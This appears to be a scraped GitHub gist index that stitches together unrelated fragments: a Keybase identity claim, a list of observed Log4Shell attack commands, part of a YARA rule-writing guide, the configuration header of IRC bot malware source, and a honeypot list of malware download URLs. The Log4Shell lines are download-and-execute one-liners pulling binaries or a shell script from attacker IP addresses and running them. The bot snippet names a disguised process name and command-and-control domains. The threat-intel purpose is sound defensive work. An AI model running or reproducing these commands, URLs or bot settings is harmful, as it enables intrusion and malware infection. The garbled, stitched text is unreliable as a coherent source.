I hereby claim:
- I am zam89 on github.
- I am zam89 (https://keybase.io/zam89) on keybase.
- I have a public key whose fingerprint is 9BF2 4455 2715 6FBE 4E63 86AD 84E9 A972 EC9B 68FE
To claim this, I am signing this object:
todays #Log4Shell activity observed: | |
- cd /usr/bin;wget http://155[.]94[.]154[.]170/bbb;curl -O http://155[.]94[.]154[.]170/bbb;chmod +x bbb;./bbb | |
- curl 152.67.63.150/king | |
- curl http://159[.]89[.]4[.]39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86 | |
- curl http://2[.]56[.]59[.]123/1 --output 1; wget -O 1 http://2[.]56[.]59[.]123/1; chmod +x 1;./1 | |
- curl http://83[.]97[.]20[.]171:6666 | |
- curl -k https://41[.]157[.]42[.]239/bk.sh | bash | |
- echo 152[.]62[.]45[.]26:8443 | |
- echo 168[.]159[.]209[.]96:8443 |
I hereby claim:
To claim this, I am signing this object:
When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.
Global rules are evaluated first. Only if they are satisfied non-global rules are evaluated. This may be useful if all samples exhibit the same characteristics. Use them combined with the "private" statement to suppress a match notification on the global rules.
#define STARTUP 1 | |
#undef IDENT // Only enable this if you absolutely have to | |
#define FAKENAME "apt-cache" // What you want this to hide as | |
#define CHAN "#mint" // Channel to join | |
#define KEY "bleh" // The key of the channel | |
int numservers=5; // Must change this to equal number of servers down there | |
char *servers[] = { | |
"updates.absentvodka.com", | |
"updates.mintylinux.com", | |
"eggstrawdinarry.mylittlerepo.com", |
# This list summarizes recent malware caught in my Kippo SSH Honeypot (http://code.google.com/p/kippo/) | |
# | |
# For detailed instructions, please see: | |
# https://blog.ls20.com/check-your-server-for-malware-from-ssh-brute-force-attacks/ | |
# | |
# Last Updated: March 24, 2014 | |
# | |
# Copyright (C) 2014 Lin Song | |
# | |
# This program is free software: you can redistribute it and/or modify it under |
http://198.50.240.201/fix | |
http://31.170.163.10/gg.tgz | |
http://angelfire.com/komales88/bengos.tar | |
http://arhivez.netfast.org/1/perli2014.txt | |
http://babytuu.altervista.org/udp.pl | |
http://babytzuu.altervista.org/udp.pl | |
http://boaka.go.ro/butzi.tgz | |
http://bucuresti.orgfree.com/d3sp3rado.tgz | |
http://byzorro.tk/shot.tgz | |
http://cioculetz.altervista.org/l.tgz |